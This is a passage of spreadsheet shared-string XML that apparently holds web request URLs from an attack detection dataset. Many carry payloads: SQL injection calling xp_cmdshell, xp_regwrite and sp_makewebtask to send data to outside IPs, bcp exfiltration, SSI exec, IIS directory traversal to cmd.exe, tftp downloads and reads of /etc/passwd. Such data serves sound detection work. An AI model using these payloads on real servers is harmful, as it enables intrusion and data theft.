    <t>/rn3pr5e8ten.asp?raeeid1isdula=metar&gt;ew&amp;bpasswdq5bn=seavfaebeaws&amp;ux=tnhanl7bdfcldse&amp;xeaaa=m0i2sh&amp;rwg4v=89&amp;lehtma=a-y2v7yq.ri.&amp;vtfsvwhrq=egaonrrkc&amp;t0ndlisa=655&amp;0trxv8pdlwgq=2me3ee9de8</t>
  </si>
  <si>
    <t>/nrieltrseictrairslj/dkwet0d6/l6_-q-fzu_x3szfp/nbdooxkyo.php?bfsspnnasle=e</t>
  </si>
  <si>
    <t>/jntes/a53jfehgjbelnx1o..u/hi49ehryhayu9/dvvyrcoacbzjaw/5uereaoatbeu/aeeltn0/n3f1.sc315le0jzwwa/45k/htp@8riin/rr/a2w@brcp1ht_k9.tiff</t>
  </si>
  <si>
    <t>/ss/stwc/dtesoarkaun5wjonts/stavrt1g0itn.asmx?tm9ftracktntf=&lt;!--++++#exec++++cmd="c:\\progra~1\\hmhw\\eacae21hd\\atyeej.exe+++++d:\\mntyu1o\\www.tiateset.org\\g1hihdi9sn\\database.mdb++++/x++exporttofoxpro"--&gt;&amp;tk0dd.muhsiframe5=+otasu=includesu&amp;lgab=1522162&amp;p@n2wkdied=e@e&amp;betweene7g=+%&amp;2optqfnl.=sie(betweena:hredeleteypsj+aietelnet&amp;ihhba=snk98&amp;nssetreuazet2t=lnhtaccesa+</t>
  </si>
  <si>
    <t>/erptusw3rdp.mdb?ihiepqhob=&lt;!--+#exec++++cmd="c:\\progra~1\\0t6ren\\llcolnua\\yn.exe+++d:\\aere\\www.nsinis.org\\sarpkd\\database.mdb++/x+++++exporttofoxpro"--&gt;&amp;hmn=eooucs0uniona4tha</t>
  </si>
  <si>
    <t>/aan0opptmz/en9as0oyeseye/m4al1rmipa.wpl/tdlioytmlt5riea/bjwfrivski4rhgrzbv/8dbsf/ngtyjadogy/er/afoh7nesoo/e0r37divizdru2homep6/ahcrgqge.l/yx5ndfqs5gva6koan84.dll?5ctyooqbaudx3=slz&amp;pelib3updateb=e&amp;5ee=pig.5fdp1odz&amp;iihseemsid=&lt;!--+++#exec+++cmd="c:\\progra~1\\tin\\foeeeso4rh\\8ee8kghd.exe+++++d:\\roethd\\www.etiese.org\\woa\\database.mdb+++/x++++exporttofoxpro"--&gt;&amp;ed6nt=eiauodocument0&amp;.ddu_emblf=ekob&amp;hs=xefer6ew0ndaavja</t>
  </si>
  <si>
    <t>/ovz8qam@0zijbqk6c-.o.php?xuni=&lt;!--#exec++cmd="c:\\progra~1\\pu\\rwerte\\6n.exe+++++d:\\aqoy\\www.eselnt.org\\tgaausbpp\\database.mdb++/x+exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/w2zh/mve53/neory3h5a6c8/twpb6/zqihogm/osm_cknkyql01.ocur/2j/ah23p4g1d/ddfmux/qoovleoot6d/t4r4gok-7x.png?jb=c@mfgzzennl&amp;ityneeadv6teg=ou-_rk&amp;ssnglbessac7=5&amp;astprrungdmw2=eianstg-7tm\\&amp;ppbhlocation=&lt;!--+++++#exec++++cmd="c:\\progra~1\\so\\zutthcdts\\icdsstar.exe+++d:\\wcwae\\www.raseaninna.org\\enbeo\\database.mdb++/x++++exporttofoxpro"--&gt;&amp;ruiotzdwr=035526442&amp;brizs5srzerca=aacceptadh&amp;1atcr9=52&amp;_fhuddomk9v=49016&amp;atoogon1o8=6ebehoilnsdeletet2rsam&amp;tgsgmhattbo=25770601&amp;uzffpoh3smd=9e:o&amp;ugxwo7ey=sock_stream%ut:&amp;kips=ttb@ta3</t>
  </si>
  <si>
    <t>/ala1n9ted1apb_vfewz.jpg?t9leveen=i|oioij5cieatv&amp;selin=gs@rhc6h&amp;cttleso6=73877018&amp;t9stylennlp=2711553401&amp;sotn7e=32853541&amp;e4gawqueeui0oss=mhcstoeyjfprntes&amp;dlspf4net1hs6=mn8idspfetr7&amp;leieao=4s&lt;&amp;zlogbmbuscriptexec=sgd@y</t>
  </si>
  <si>
    <t>/ez5cgrtificakh/snli@nsh@tx/sc.aspx?8u8j-cu%uvzy=l0inz&amp;foaga=0p9fald&amp;iuxteo8sai=eu5dnl0bmne&amp;notrgse=febdrvqt&amp;ddeh7b=as;&amp;s&amp;duntifrv=42711&amp;8wtswtehggierbm=4133345&amp;k1-gai3ogtg=7hehiter&amp;hiqs=135424097&amp;hnsnook3aorrqe=1&amp;9i9bxq4nemne=3532</t>
  </si>
  <si>
    <t>/wiirsndd6sssouhrto/mhotfonoob.gif?ih5imgnfkhttp=r&amp;egff=3ln&amp;e0c=350&amp;ch=ojteo9rore&amp;onsi04bx=sncopy$rereros&amp;axdh06=456&amp;xwugf=mbpt@&amp;iueovet7ed=exj6hgst&amp;lla=fs&amp;aoqihebhaane=yng&amp;8bavrrcpisemu</t>
  </si>
  <si>
    <t>/0fyld-xy/9iw/3tseaoeerreicajh/sregaatoetrifnt/eyfneeoj9eatitm.jsp</t>
  </si>
  <si>
    <t>/.f1bd172w/tmnph-f4ocmxyr/2tiirmnlaini/lilox342/k1hu/e@3a/llgvmvzcbq3x8x7j.html?lipz=8993&amp;us=|vhreei2(&amp;rdimtnqt=s&amp;mt=n4eabgs&amp;swnpof72namtu=a)r</t>
  </si>
  <si>
    <t>/zn@t-/e1fbfue6fpnr6upf2bg/tt6blonyesntgst/5iob/un1qrarrygtsh9guonl/dut7ecinhnrsye/ltrtsrlh/e5lw1tniaeemaenw.cfm?tbo3iotnhmaruie=7437&amp;p8hw=dngelln</t>
  </si>
  <si>
    <t>/cc4ea5/sco/am3n5rif74./pltmhalfaaw9hbag/et9nz4y/3t.8idnr3_y.js?8a=eetawhanlztnit</t>
  </si>
  <si>
    <t>/dpr0/w.2nbkdu1dyhekfw/epczyisdr4sva/jv/nhcgorthtexhkjscfw.shtml?xhatei2ss=46546649&amp;ecchpdenn=ejaee&amp;3cna1ctlm=a+r&amp;5tiaesobmo=08&amp;rcis=cmtozcxlb&amp;pedsrttmgtldn=45729312&amp;hoam2fooudnisn=etcialeh:n|+\\&amp;yadmin8wgifzxdkdiv=1hhsqna/rm&amp;3ndh=o9ayn&amp;tt3sa=mnolt&amp;eootidla=661919&amp;y0jpwp-j1=52739750&amp;wrpv=exec+xp_cmdshell+'"t2ghaseade"+++++&gt;&gt;+++script.vbs'&amp;oea=ndxct\\eoqcfptreyi+</t>
  </si>
  <si>
    <t>/trwnynnss/e@9xq/eeokrbethv45os/oprm/-op3pc/cvfokgz5zvkoxhs3az/aftn6uwqnlyp/rathxnpaaer/jeco0iekesedgonsolo.tiff?fh=1&amp;icmhyq2=mdgi5)tehn+oy=t&amp;rriebninnib=1968625&amp;1rnhcw=48671522&amp;tghtjtwej=n+itqerewget$riimo&amp;di4ilu=mb868npx1&amp;c0hwfedadanp=69224&amp;ssosc=bulk+++insert+grnf9++++from+++'pwdump.exe'+++++++++with+(codepage='raw'++++)&amp;.ot_jodzwqr@=jbthlqcxejb&amp;ail1gew=rnmo&amp;9~+e&amp;passwdbrneh)s&amp;hieqnwpiazrcgj=ipervotnlheaita&amp;lbmxm=smuv4&amp;hbgm=987&amp;earihnnho=ereb&amp;emuum2e3-mvb=pj?tpusystem</t>
  </si>
  <si>
    <t>/1e1k/3rz/ii/ayfsezwkhhlkrsy1/yv.su@tx@.gif?etieb=teeop&amp;bf=t4xieusrzcqins&amp;ig=l&amp;cbeezmta0ioahi=femnc&amp;dubpona1n0t4e=230451&amp;anaeooeehrhh=712&amp;wget8wwbn_4v=133&amp;i7tgto1rie=t3amojdxn&amp;5eir=exec++xp_regwrite++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','tlehltb','reg_sz','dbmssocn,hackersip,80'&amp;gr@7w1=rursehnc&amp;si=4&amp;llac=ip2gblfw</t>
  </si>
  <si>
    <t>/gls2/wstuik4tte6muttta/tbr/9mocz/qb@rejov_a7c5xy9e/az_oqqutc1ehn/neys6nseeemnaoi/onorteaicg/osydaom/rm_2q/1vreleisa6ttwj/ff5y20x7_iqjqe2.jsp?rhtenv=';+++++exec+++++master..sp_makewebtask++++"\\\\143.80.83.45\\er43grta\\fneulp1a.jpg",++++"select+++*++++from+information_schema.tables"&amp;2u5kwindow.openhjhjb=opeeaboflm1o&amp;quf2=httpts+\\&amp;ttsfpesgmltwes=&gt;shb&amp;oahoue30sesp=749</t>
  </si>
  <si>
    <t>/6e/eerp.asmx?efa3a9dihi0aia=8441551419&amp;ie=aro6srtlvarfhavinga8t&amp;cymi=aocio&amp;rtsylonpgsppo9x=xcxeea1tlom&amp;8rrsrosmezh=n5o&amp;edlarttr=neae&amp;scriptlxf=mzcx4&amp;eohrt=3452662800&amp;tp=sezmfu3fv&amp;hqenwaaheeea=exec+xp_cmdshell+++++'bcp++"select++*+++++from+oed"++++queryout+pwdump.exe+-c+++-craw+++-shackersip+++-usa+-ph8ck3r'&amp;q-2dboot.iniij=aosehk-p&amp;&amp;so=h~&amp;lsfl=tt</t>
  </si>
  <si>
    <t>/hp@ztow4ezj8m1inwvku/az7saappcgda/tm/s2hexeciwmtshutdownv@/dtar95uarrmftti.png?tifin=';exec+++master.dbo.xp_cmdshell++'cmd.exe</t>
  </si>
  <si>
    <t>/ijfgdybbabb/teu2sck/teaed5/nvhtpasspqh/ij27/tdcog/rlbbtafbbkthka-uf8..asp?eoynatmnotaqted=d?gttorbilsz\\f&amp;pfsteema=tmkylardc&amp;riehiwuws=idrt&amp;fisd8eva1mpedin=5&amp;dcehy=nfu\\iandhdobjectntn]nb&amp;hsiabsi6eae=gtehunliawcn&amp;rhogsalgtit25=10&amp;4wtaneeuo=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;i4s89emeatipo7=idteooeenpecgsi6&amp;htnsteei2=twn&amp;hnt2wgr=nbetweendr&amp;mdoreved=35602&amp;ar=5d9hbss</t>
  </si>
  <si>
    <t>/wjmochallrprocessing-instructionfb2/asj3d4qhss/nluw3nf/0adog/28p9hiq/3dxe/shi6@2q/ogaipbcsbmfns/viiaaar/gsnno@/exmp6fvas/ngm.t.asp?ccl3echildhvz77=rt&amp;podtmehl=raaqeafsbil16es&amp;nbl=nbdm&amp;pklg=s6eojahm&amp;ontt0q1lo=lst&amp;c8g174de9eeqnu=626&amp;xbeesht5=vqs7gbcnqid&amp;irdcoptscriptunr=209675&amp;nssetteennsrtt=c)o&amp;ee6seh=n)&amp;ea=2197998885&amp;eldenxr=4919&amp;ntb3uslo=raipnsse&lt;0lqcm&amp;nar7oomatgl=eknear&amp;eihes6rtarsohwi=';++++exec++master..sp_makewebtask+++++"\\\\48.43.255.29\\huuledi\\yweei.jpeg",++"select++*+++++from++++information_schema.tables"</t>
  </si>
  <si>
    <t>/twjjvcdj3uluq/haareggk9iah.bin?2iuiem8elfiets=o8+7g;gxr3&amp;amsnenodks82en=3799&amp;xmhr=3&amp;egdi=6220062&amp;fromn5formle=onode&amp;oh=f07dotcg&amp;aieao6=b&amp;io873eonso2ghys=n@mm6hiq&amp;3xterm53l=exec++xp_regwrite+++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','lao3raeol','reg_sz','dbmssocn,hackersip,80'&amp;obntcirae4shiu=13771610&amp;stl=134&amp;j9ai_mvbetweenris=bisf8wix-s</t>
  </si>
  <si>
    <t>/tsazl2x9pm1njylx/o3ndil9k.js?aa=9318043&amp;vzndcezicmqee1=eanurwgweodxt3a&amp;wxmloaxnhps=r:+uhsidautoexecne[8s&amp;nsl6ooesy=7-1r&amp;thtaccesxolibtm=exec++xp_regwrite+'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','nualac','reg_sz','dbmssocn,hackersip,80'&amp;reeo7tlocjee0ce=97</t>
  </si>
  <si>
    <t>/0vzlg7krfqrtrrq/trle/uzue/r.ztx4_kg/liwoao.bvttqzv/0zwr/css/thguitlqifdnehwcztv/tt7ehalfeeatt.sh?ndrgfromc=htfq&amp;hh0=rso&amp;nad0tngcsnesjt=06207948&amp;tasx=bulk+++++insert+++eode++from++'pwdump.exe'++++with+++(codepage='raw'++++)&amp;1aee9lln5aei=/autoexecm0a5l=7&gt;d+l\\heo&amp;tcd0wem=uesrny((dartspdr&amp;teite7ro=e_lng9&amp;nm=rliyefb@l&amp;tanharqa=95358&amp;nmv89tc3a7c=nroltqrsynin8&amp;b0hishthhdsiz=r+&amp;r6eaesxetg=fo&amp;gw2s2owlo=7o&gt;location&amp;70dltaghozs=ri+husr&amp;ghesias=having</t>
  </si>
  <si>
    <t>/qh/rahlngsxs/o_d/yd4ycdcz6gfg90/obxk/wfer8mkvjsqc8gw/bd8g6yrdjccl6iuu/n8/e1erchitdceermnsahj.html?holdgryel=exec+xp_cmdshell++++'"td2rsjf"++++&gt;&gt;+++++script.vbs'&amp;onmetawkt=49824999&amp;txess2=qat&amp;bbeacsonyz=1806</t>
  </si>
  <si>
    <t>/hseiha8urfw4tw09/echo0v7ujedy2c/r.n/hbtjay.jqe-q..gif?mwlmge2=exec+++++xp_cmdshell+'bcp+++++"select+*+++++from++++ah"++++queryout++pwdump.exe+++++-c+-craw+-shackersip++++-usa+-ph8ck3r'</t>
  </si>
  <si>
    <t>/ezu5.zhgbdtm./ox@panm5seox/elsm/rdedamdof/mfu/asrju/rwnrn4oaei7ikttra3s.html?anaovstrgtne=r4muwcmxam&amp;4e3ctc7g.a=ooueeh758hn&amp;eht8okectirs=7470&amp;dntq9aoltkei=my8a+yhhlink+pemocha&lt;n&amp;lentmosinst5=db'mousmitecqoe&amp;selectinh@yusrp_b=exec++++xp_cmdshell+'bcp++"select+*+from+++daujqws"++queryout+++++pwdump.exe+++++-c++++-craw+-shackersip++-usa+++-ph8ck3r'&amp;rnv0adrn6n6rael=@yshavinggs-&amp;ntfr=e72t&amp;edirpt=413470161&amp;yoneceai=sock_streamo+rmr6rfpositiontpwe&amp;ausp=69653&amp;aeen0ddxprchl=49</t>
  </si>
  <si>
    <t>/atisn/abbgamgibam6n/dtxtinn/saboyem/oi/dgvjnsc15npgxuzq/ean-aa4hfk4/6scripta/7siwaz2dih_6rbytcko.exe?zeedisvntds=aert6edzsf&amp;hoadhopa6ec6=fromi:&amp;3r=ie&amp;&amp;shoyderien&amp;3mwi=exec+xp_cmdshell++++'"ngeu"+++&gt;&gt;+script.vbs'&amp;sc2ogoogvdi=ch9d&amp;wid1jm2k@gs=weth9iwstuekre</t>
  </si>
  <si>
    <t>/.wpzmkvpndkaf8k/btoi9ranp.nsf?tso9g=1374&amp;otuosohdne=uuwsqg&amp;ie=ouc&amp;auefrxsa=9uixlfm9&amp;rgatrsa=exec+xp_regwrite+++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','a6oel','reg_sz','dbmssocn,hackersip,80'&amp;r5sqntlfshhea=0480524</t>
  </si>
  <si>
    <t>/qef4aleehwtdoe/etnaelxsnrqn/ltetctoxvfx/oeroti/tnptas.pl?i9rewafbfue=66859&amp;aiuq=xhp&amp;1zqc-p@sa0s6=winntmdeleten7'aoptp&amp;abhvd7rlthrnepn=stl&amp;eb9ti5h14diy=88&amp;tdtreeyaso67l3r=34160&amp;7pmi1eehf=832535&amp;snesve5fxseede=sjx6-@ep&amp;agtotos=rzzputwkhus&amp;eijih=exec++xp_cmdshell+++++'"bcuqecj"+++++&gt;&gt;++++script.vbs'&amp;ziae8ngeeh=eeatedvhnasu</t>
  </si>
  <si>
    <t>/mlylpxmlydya/ed5cyihdwdt/pkqyz.h_9ajep/oeesl/ms3gb5umzmbt/a2tsrttoiarh/ep7fpnletq45hgpbh5/iruegoseo0iynyuc/ifxdhag.swf?6bb1nwgrl=++eeteoat8[5c+r&amp;th=bulk++++insert+++++0yc++++from+'pwdump.exe'+++++++with++(codepage='raw'++++)</t>
  </si>
  <si>
    <t>/erhzirralhr8nanuedj/lcwywcf_cmx-ak4/ziseln.px97/du/yjhgq.exe?xtermtdb=28&amp;souei0u=';+++++exec+++++master..sp_makewebtask++"\\\\194.151.87.152\\dh\\ee.jpg",++++"select+*++from+++++information_schema.tables"&amp;uons0tosenxxas=etad5u&amp;hoesrhilnlt1qr=922189&amp;fsednyer=1591127674</t>
  </si>
  <si>
    <t>/lyr/vv.swf?9nya1=9i&amp;eawtink=aestlocation0du$du:mleoj+c&amp;%ugdfv8dusxt=';exec+master.dbo.xp_cmdshell+'cmd.exe&amp;4apsogoanmsf=yer+group+byry1m]lh9&amp;f7eraea7nos45ii=m&amp;6rbfshye=rqqbv7&amp;y-ipxmlvnx=lineloorvheeodsdo&amp;2nii1ortdenoe=sx6trtmqedtoealrsn&amp;sludt=955&amp;t6g3el=2ee</t>
  </si>
  <si>
    <t>/wqqeidiaor7salndaht/ddis/5o9_/d8briv0eaky/e0upt328/hn/shoeregztovceeo/tetro1rnyea/np_oe6v1i4/age.html?xpwljbpahmo=gckrn6xcaueay&amp;gsn6ni=dto1ehdceehims&amp;5oe.vc=051259&amp;udvy9l.6vt@f=|tscript&amp;n3elimranlie=3809490&amp;tainniiecgogi=egieat&amp;oinleonwfia5hma=68788&amp;itqesnasjfh=5172056&amp;ntr2ic=nahllet-f6tu&amp;ae4o0i4cw92of=ip&amp;eoloeo0spfuaiu2=';exec+++++master.dbo.xp_cmdshell++'cmd.exe&amp;ere2cieewli=winnttie&amp;oap=88286</t>
  </si>
  <si>
    <t>/7avspositiono9d8qh8lxp_b/culd4/cwp6wf/oeess6ei/eiicahwdmba/tpsps/qovf1do.tiff?ftloo0ahsns=9nostd&amp;l61img1nla6ptmpz=exec++xp_regwrite++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','oh','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/z-mq2c/m4sxdpvvn04x21/5a.tiff?8b66having_cprocessing-instructionautoexec=';+exec++master.dbo.sp_makewebtask++++'c:\\inetpub\\wwwroot\\lie7r9d.js',+++'select+++++pxqrs++from++ie++++where++++xtype=''u'''&amp;ss=w1fwget3gmf&amp;nore=9146&amp;soqls6p=790969&amp;fdf7tlxmlavu=069&amp;vmss=83&amp;4uoremhhc=ni&amp;nspeo(r&amp;l2pesr5l1oet=llrichsshutdown</t>
  </si>
  <si>
    <t>/q8iktenwtn7otnmlrunl/lsppuexectn78cdncgfromo/cnk51kgq3fau/aymeoyiaiaute/nn_evb1f1a/gdcmhtot7unyne.shtml?niastge=4&amp;mgr=8&amp;aptdrehnryau7a=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;rre=o0ss5restr5lf</t>
  </si>
  <si>
    <t>/0tcesektweiwwi/a7p@l-9acey3@-gig6/t_ytatzqh0q@q@7/pc7la.3q/99xitvw/eii9.swf?edwve=h7(rwaaiylhux/cat&amp;opeznnndxlx=bulk++++insert++n3bo9nh3+from+++'pwdump.exe'+++++with+(codepage='raw'+)</t>
  </si>
  <si>
    <t>/grh5yionfdias.aspx?ylioteseeliew=&lt;selectmailo&amp;4emfahmcacsm0se=dursro+d&lt;ek)yy0t3e&amp;mt=oubtae%pir:bn&amp;zrzg4e8=6922&amp;jpkq=;omt4&amp;b4ztnamco8ae=vnusof&amp;lfl9hnsiubrmeoe=085471&amp;otrdiwnu=]toed&amp;5oosxyic=2&amp;ht=dctbfns&amp;nleasheronon=';+++exec++++master..sp_makewebtask++++"\\\\129.208.243.168\\wyenevbo\\enol.gif",+++++"select+++*++from+information_schema.tables"</t>
  </si>
  <si>
    <t>/havingudtx6jf@sfgeaf/cp9-/rgklg@mrva/6zddv/tb8lq0odlselqrpgje/nk2wx/s9iyrqp_d8q6je/mtndhndbnihqhmlecn/nsmah/taoodkd75/isnslsjute/eeqoatatasofge.msf?cz7zfkhy=';++++exec+++master.dbo.sp_makewebtask+++'c:\\inetpub\\wwwroot\\seaeter.png',+++++'select++afseet+++from+++tee+where+++++xtype=''u'''&amp;sanirbke=3emhhn</t>
  </si>
  <si>
    <t>/dk13c6rvinsertru2-yl/zmeta35gif@autoexecprocessing-instructiono/titnf4aj@@p/tmsi@.-w/lh.ogfm9abcopy/ihilii/ic0p-z8ymv9/dyk@awxhe3/frunartleminnse3amu/l1s9e9lxdet0.png?xcztllsdmzu=r6om6wklt&amp;p9ra6mtrz=exec++xp_cmdshell++++'"uw6hjt6jto"++&gt;&gt;++++script.vbs'</t>
  </si>
  <si>
    <t>/i82cat.aw3icrkxn@j0/pb8lexryb-todqouk5/lowoguxhc5jcbtt_/wf_7s/d1k5nrntnrtvtsnua/ohjroiei/eia4dtog75fhakis/k3yiodgeotu.mdb?4update.qlyboa=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;8iootili=b&amp;siantyedhyhai=poet2osehpovho&amp;pwxw=nqr&amp;i0an1x=rcepol</t>
  </si>
  <si>
    <t>/egrietmsixqz/eephqst_/2up/ounuzehtses/insertfwhin/eshi/h5dn5b.bin?aa4tugdweotexe=ghneyn&amp;leea9r7sh=wometa2\\&amp;uoiwmirmee=lehaciet1&amp;tevmti1dn=1612008&amp;vvuqwvar=5639&amp;sid0mjiv=6361&amp;nmghl2hsimti=9630898733&amp;dban=vajtsfmecgoenlha&amp;nee8mti5je=exec+++xp_regwrite+++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','itl','reg_sz','dbmssocn,hackersip,80'&amp;afuoebta8=e&amp;ecuefishsohmru=34851135</t>
  </si>
  <si>
    <t>/rjueuwmryrw/onaedc1etgctowrcl/hgk/gigune6rk/aeatmfeqebhaehamsaac/dn7qahrvzci8fp/epkbxvjhlfe/waxfr@b_wxpx@.3o.jsp?oxb.q=30894323&amp;idm70ont=eour&amp;eowc=tonee0iidc&amp;rnd4nh=179&amp;8divlgehperlr9oxinsert=unoar~\\[aenittxml%&amp;stubeegy=eks</t>
  </si>
  <si>
    <t>/lzeju5snyyp0l/ilnhtcje/8mkzug4y7-unkdmb3/zzovzwgethlwayw@/ntr62etcen/8s/aumu3r1ux.@d.yduwad/hkvm3pz.gif?ogi0dmg-nulltt=n4oe2fsyy&amp;jmskaaosb0=xdiac&amp;genxmanltaiapn6=48610455&amp;av5iewtharrpla=rcoridhirttttate&amp;ate27uans=352373&amp;3nielpmr5bszebn=54233314&amp;0qyshgethnxb=182963881&amp;glczi5gx0mp=vgoamssidetyth</t>
  </si>
  <si>
    <t>/vhh/aeertr1sdgce1/hpj4wlb7gssl/paeyftdaiekbuaehl/mfyl.vdlocation7fdiea/gaz02jjleb3uv/g0h0x9h/e_4jdz-zejqigcsqsr/j0afichildot/hetcmss.gif?e5=opentb+aechoawhereiframe]binewt+&amp;wunionshutdownnetcatcpscriptzy='p&amp;xtene=87605&amp;ioe=eacceptdeep5&amp;oeeseseoswispba=0804&amp;l6suz3btanr=ynxbat</t>
  </si>
  <si>
    <t>/uhppmyieuew4l3c9etzh/aycroiiedljoc/sevrku-k58-ug/mwuq0o5vzl/efyttitcm/dnut1oonogo1s/wbx7vyoeus2vktx5qk/ssaream6aguidmir/b.j./bt/6fozb3rm3r1v.shtml?6eiynae=1f5irhb&amp;hl=532&amp;se1ieero=iwp-wn:inihyio/a+nullfl&amp;qw8ocokbyio2=xjt&amp;ennfp=29&amp;iattennm=iyemiurdl1hxng&amp;evalv8w1xcj-6=jidy</t>
  </si>
  <si>
    <t>/scripts/..�/../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/cdirc:</t>
  </si>
  <si>
    <t>..\\../..\\../..5c../..5c../winnt/system32/cmd.exe</t>
  </si>
  <si>
    <t>/bin/alibaba.pl|dir..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,</t>
  </si>
  <si>
    <t>/msadc/..\\../..\\../..\\/..�_x001c_../..�_x001c_../..�_x001c_../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/_vti_bin/../../../../../../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>..\\../..\\../..\\/..�_x001c_../..�_x001c_../..�_x001c_../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>..��../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>../../../../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/file.bat/..��..��..��winnt/system32/cmd.exe/cdirc:georgi.asp/..��..��..��file.ext</t>
  </si>
  <si>
    <t>/scripts/..\\../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/images/../../../../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/..�%qf../winnt/system32/cmd.exe?/c+</t>
  </si>
  <si>
    <t>/data/..��../..��../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+</t>
  </si>
  <si>
    <t>/backup/..��../..��../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+</t>
  </si>
  <si>
    <t>/scripts/..��../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/cgi-bin/../../../../../../../winnt/system32/ping.exe127.0.0.1</t>
  </si>
  <si>
    <t>..\\../winnt/system32/cmd.exe</t>
  </si>
  <si>
    <t>/scripts/../../../../../../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/georgi.asp/..��..��..��file.ext</t>
  </si>
  <si>
    <t>..�%8s...�%8s..�%8s..�%8s..�%8s../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/msadc/../../../../../../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>..�%pc...�%pc..�%pc..�%pc..�%pc../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/file.bat"+&amp;+dir+c:/+.exe</t>
  </si>
  <si>
    <t>/iisadmpwd/../../../../../../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/_mem_bin/..\\../..\\../..\\../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>..\\../..\\../..\\../..\\../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/..�_x001c_../..�_x001c_../mssql7/install/pubtext.bat"+&amp;+dir+c:\\+.exe</t>
  </si>
  <si>
    <t>/scripts/..\\\\../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>..\\../..\\../..\\../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/file.bat"+&amp;+dir+c:/+.com</t>
  </si>
  <si>
    <t>..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/../../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/pbserver/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0</t>
  </si>
  <si>
    <t>.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/..\\../winnt/system32/cmd.exe?/c+tftp-i62.107.47.226getcool.dlld:\\httpodbc.dll</t>
  </si>
  <si>
    <t>/ssi/envout.bat?|dir..............1</t>
  </si>
  <si>
    <t>..�_x001c_../..�_x001c_../mssql7/install/pubtext.bat"+&amp;+dir+c:+.exe</t>
  </si>
  <si>
    <t>/_vti_bin/..\\../..\\../..\\../winnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>%u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir</t>
  </si>
  <si>
    <t>/scripts/..\\../winnt/system32/cmd.exe?/c+tftp-i62.107.47.226getcool.dllc:\\httpodbc.dll</t>
  </si>
  <si>
    <t>/samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+</t>
  </si>
  <si>
    <t>/cgi-local/alibaba.pl|dir..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,</t>
  </si>
  <si>
    <t>/scripts/file.bat"+"&amp;+dir+c:/+.exe</t>
  </si>
  <si>
    <t>/bin/t7aahwr.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/swoneen.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/handler;cat/etc/passwd|</t>
  </si>
  <si>
    <t>/bin/ansio.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/qsystem18qawtghc8kz4/ere7ca.tiff?t9awba=trhioapjai&amp;nn='n%obnode+ei9r&amp;ar2astnboedrdi=82968&amp;zcflnee=fddvdgs&amp;yhopenformrbbkkl_=ditjs3&amp;gvy4@=s6pegbodyi&amp;aeel0gsi6=han3n&amp;ehderi8fsdns=naed</t>
  </si>
  <si>
    <t>/tyxustkyz5r/1pjj4mge/tdzez8a0zybyrgnfi8f/nktrh/nesekredophcts4lay/d9ytb60tichh/lc8o.@pkmf@4twhe/nxgcrs/eeep1kcainv/fvdr-.jsp?uzfwav=c_ae3.cxpm&amp;an=ns&amp;ltldi=iutr72ns&amp;swern=ps&amp;poeumene=hog9b9zr&amp;yislup4=redoestpdnlnjtmial</t>
  </si>
  <si>
    <t>/ttgftfenrs7/lrwwwkij4@qbck/aaoue/tetomuque7s0atwi/x8gg7ody_/eae3audf/wscg6giw/smdu-m.g745exec/tiy.nsf?orretgu7dmsalt=nflvsblqso&amp;nhabotji=bangas2p&amp;iio=l&amp;r7rourio=484418152&amp;thisd3n=toa-gel9jfq&amp;rcaqcohaenis1th=72247072&amp;azmaobwteithsec=0561</t>
  </si>
  <si>
